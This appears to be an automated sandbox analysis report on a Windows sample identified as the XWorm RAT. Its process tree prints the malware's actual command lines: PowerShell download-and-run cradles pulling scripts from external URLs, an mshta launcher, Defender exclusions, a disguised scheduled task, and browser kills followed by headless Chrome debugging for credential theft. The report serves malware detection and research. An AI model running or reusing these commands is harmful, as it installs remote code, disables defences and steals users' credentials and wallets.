Edit tour

Windows Analysis Report
spreadmalware.exe

Overview

General Information

Sample name:	spreadmalware.exe
Analysis ID:	1585828
MD5:	3437a2105a9740ad94b06f04378bb5b9
SHA1:	80ca4ebff21e3a4962ccdec2853308ba544cdeb9
SHA256:	688fae8fd065227f1846cf2759f1946fc86a3d1fa2473c664595d6c32131b028
Tags:	exeuser-zhuzhu0009
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Attempt to bypass Chrome Application-Bound Encryption

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

Contains functionality to log keystrokes (.Net Source)

Excessive usage of taskkill to terminate processes

Found Tor onion address

Found many strings related to Crypto-Wallets (likely being stolen)

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Powershell drops PE file

Powershell is started from unusual location (likely to bypass HIPS)

Protects its processes via BreakOnTermination flag

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Reads the Security eventlog

Reads the System eventlog

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Sigma detected: MSHTA Suspicious Execution 01

Sigma detected: Potential Data Stealing Via Chromium Headless Debugging

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: PowerShell Download and Execution Cradles

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Suspicious MSHTA Child Process

Suspicious powershell command line found

Tries to harvest and steal browser information (history, passwords, etc)

Tries to open files direct via NTFS file id

Tries to steal Crypto Currency Wallets

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality to detect virtual machines (SLDT)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for the Microsoft Outlook file path

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Browser Execution In Headless Mode

Sigma detected: Browser Started with Remote Debugging

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: PowerShell Web Download

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Schtasks From Env Var Folder

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: Use Short Name Path in Command Line

Sigma detected: Wscript Shell Run In CommandLine

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Uses taskkill to terminate processes

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

spreadmalware.exe (PID: 7356 cmdline: "C:\Users\user\Desktop\spreadmalware.exe" MD5: 3437A2105A9740AD94B06F04378BB5B9)

cmd.exe (PID: 7868 cmdline: "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7912 cmdline: powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 8176 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\runtime.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

findstr.exe (PID: 5408 cmdline: findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 6932 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo \\user-PC " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

findstr.exe (PID: 6936 cmdline: findstr /i "DADDYSERVER" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

findstr.exe (PID: 2268 cmdline: findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

cmd.exe (PID: 7208 cmdline: C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

WMIC.exe (PID: 6312 cmdline: wmic computersystem get manufacturer /value MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

findstr.exe (PID: 5428 cmdline: findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

findstr.exe (PID: 6660 cmdline: findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

findstr.exe (PID: 7248 cmdline: findstr /i "echo" "C:\Users\user\AppData\Roaming\runtime.bat" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)

chcp.com (PID: 4340 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

doskey.exe (PID: 7436 cmdline: doskey /listsize=0 MD5: F6D134052BCB12103B729E4D2EA15B91)

cmd.exe (PID: 1476 cmdline: C:\Windows\system32\cmd.exe /c wmic computersystem get manufacturer /value MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

WMIC.exe (PID: 7456 cmdline: wmic computersystem get manufacturer /value MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

mshta.exe (PID: 7752 cmdline: mshta vbscript:CreateObject("WScript.Shell").Run("powershell -command ""iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex""",0)(window.close) MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7372 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1') | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

csc.exe (PID: 7968 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m1dly232\m1dly232.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 7952 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES8ECC.tmp" "c:\Users\user\AppData\Local\Temp\m1dly232\CSC716D4489C5CC45ECB9EB6334571A58C.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

attrib.exe (PID: 1660 cmdline: "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D} MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

powershell.exe (PID: 7460 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing')) MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1916 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3896 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7808 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 1156 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ReAgentc.exe (PID: 6400 cmdline: reagentc.exe /disable MD5: A109CC3B919C7D40E4114966340F39E5)

taskkill.exe (PID: 4220 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 3672 cmdline: taskkill /F /IM firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 4564 cmdline: taskkill /F /IM brave.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 4252 cmdline: taskkill /F /IM opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 1496 cmdline: taskkill /F /IM kometa.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 8180 cmdline: taskkill /F /IM orbitum.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7136 cmdline: taskkill /F /IM centbrowser.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 8088 cmdline: taskkill /F /IM 7star.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 3672 cmdline: taskkill /F /IM sputnik.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7112 cmdline: taskkill /F /IM vivaldi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 5376 cmdline: taskkill /F /IM epicprivacybrowser.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7280 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 4232 cmdline: taskkill /F /IM uran.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 3180 cmdline: taskkill /F /IM yandex.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 6196 cmdline: taskkill /F /IM iridium.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 8080 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

chrome.exe (PID: 1496 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 7548 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1716 --field-trial-handle=1420,i,15861120058079520780,17955298355358665640,262144 --disable-features=PaintHolding /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

taskkill.exe (PID: 5204 cmdline: taskkill /F /IM chrome.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 3180 cmdline: taskkill /F /IM firefox.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7836 cmdline: taskkill /F /IM brave.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7512 cmdline: taskkill /F /IM opera.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 5192 cmdline: taskkill /F /IM kometa.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 4904 cmdline: taskkill /F /IM orbitum.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 5208 cmdline: taskkill /F /IM centbrowser.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7280 cmdline: taskkill /F /IM 7star.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 4324 cmdline: taskkill /F /IM sputnik.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 7852 cmdline: taskkill /F /IM vivaldi.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 6992 cmdline: taskkill /F /IM epicprivacybrowser.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 1108 cmdline: taskkill /F /IM msedge.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 6816 cmdline: taskkill /F /IM uran.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 2000 cmdline: taskkill /F /IM yandex.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

taskkill.exe (PID: 3024 cmdline: taskkill /F /IM iridium.exe MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)

schtasks.exe (PID: 6624 cmdline: schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHEST MD5: 76CD6626DD8834BD4A42E6A565104DC2)

conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

mshta.exe (PID: 8092 cmdline: mshta.exe vbscript:createobject("wscript.shell").run("powershell iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1')|iex",0)(window.close) MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)

powershell.exe (PID: 7516 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iwr('https://raw.githubusercontent.com/43a1723/test/main/download.ps1')|iex MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

csc.exe (PID: 6204 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c2ejd4wa\c2ejd4wa.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

cvtres.exe (PID: 7808 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESB485.tmp" "c:\Users\user\AppData\Local\Temp\c2ejd4wa\CSC99BE4B68E03746B880F950F6606729FB.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

conhost.exe (PID: 6920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 6200 cmdline: "C:\Windows\system32\attrib.exe" +h +s C:\ProgramData\Loader..{21EC2020-3AEA-1069-A2DD-08002B30309D} MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

powershell.exe (PID: 7556 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/Mewing')) MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7376 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1')) MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 5696 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

DisplayDriverUpdater.exe (PID: 812 cmdline: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xd37f3:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0xb01109:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0xd860c:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB 0xb0601e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB

Memory Dumps

Source	Rule	Description	Author	Strings
00000033.00000002.1811615016.000002B200C5D000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xd818:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x10d4e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x67b3:$str01: $VB$Local_Port 0x67a4:$str02: $VB$Local_Host 0x6a0d:$str03: get_Jpeg 0x6477:$str04: get_ServicePack 0x75a5:$str05: Select * from AntivirusProduct 0x77a3:$str06: PCRestart 0x77b7:$str07: shutdown.exe /f /r /t 0 0x7869:$str08: StopReport 0x783f:$str09: StopDDos 0x7935:$str10: sendPlugin 0x7ab5:$str12: -ExecutionPolicy Bypass -File " 0x7bde:$str13: Content-length: 5235
00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7e4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7ee8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7ffd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7af9:$cnc4: POST / HTTP/1.1
00000033.00000002.1811615016.000002B2014FE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000033.00000002.1811615016.000002B2014FE000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x13e80b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x147864:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x13e8a8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x14791c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x13e9bd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x147a4c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x13e4b9:$cnc4: POST / HTTP/1.1
00000033.00000002.2579212650.000002B268D90000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xaf08:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0xe43e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000033.00000002.1811615016.000002B200C73000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0xc2c8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0xf7fe:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: powershell.exe PID: 1156	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7376	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
51.2.powershell.exe.2b2016349c0.0.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
51.2.powershell.exe.2b2016349c0.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
51.2.powershell.exe.2b2016349c0.0.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x67b3:$str01: $VB$Local_Port 0x67a4:$str02: $VB$Local_Host 0x6a0d:$str03: get_Jpeg 0x6477:$str04: get_ServicePack 0x75a5:$str05: Select * from AntivirusProduct 0x77a3:$str06: PCRestart 0x77b7:$str07: shutdown.exe /f /r /t 0 0x7869:$str08: StopReport 0x783f:$str09: StopDDos 0x7935:$str10: sendPlugin 0x7ab5:$str12: -ExecutionPolicy Bypass -File " 0x7bde:$str13: Content-length: 5235
51.2.powershell.exe.2b2016349c0.0.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7e4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10ea4:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7ee8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x10f5c:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7ffd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1108c:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7af9:$cnc4: POST / HTTP/1.1
51.2.powershell.exe.2b268dd0000.1.raw.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
51.2.powershell.exe.2b268dd0000.1.raw.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x67b3:$str01: $VB$Local_Port 0x67a4:$str02: $VB$Local_Host 0x6a0d:$str03: get_Jpeg 0x6477:$str04: get_ServicePack 0x75a5:$str05: Select * from AntivirusProduct 0x77a3:$str06: PCRestart 0x77b7:$str07: shutdown.exe /f /r /t 0 0x7869:$str08: StopReport 0x783f:$str09: StopDDos 0x7935:$str10: sendPlugin 0x7ab5:$str12: -ExecutionPolicy Bypass -File " 0x7bde:$str13: Content-length: 5235
51.2.powershell.exe.2b268dd0000.1.raw.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x7e4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7ee8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7ffd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7af9:$cnc4: POST / HTTP/1.1
51.2.powershell.exe.2b268dd0000.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
51.2.powershell.exe.2b268dd0000.1.unpack	rat_win_xworm_v3	Finds XWorm (version XClient, v3) samples based on characteristic strings	Sekoia.io	0x49b3:$str01: $VB$Local_Port 0x49a4:$str02: $VB$Local_Host 0x4c0d:$str03: get_Jpeg 0x4677:$str04: get_ServicePack 0x57a5:$str05: Select * from AntivirusProduct 0x59a3:$str06: PCRestart 0x59b7:$str07: shutdown.exe /f /r /t 0 0x5a69:$str08: StopReport 0x5a3f:$str09: StopDDos 0x5b35:$str10: sendPlugin 0x5cb5:$str12: -ExecutionPolicy Bypass -File " 0x5dde:$str13: Content-length: 5235
51.2.powershell.exe.2b268dd0000.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x604b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x60e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x61fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5cf9:$cnc4: POST / HTTP/1.1
51.2.powershell.exe.2b2016349c0.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
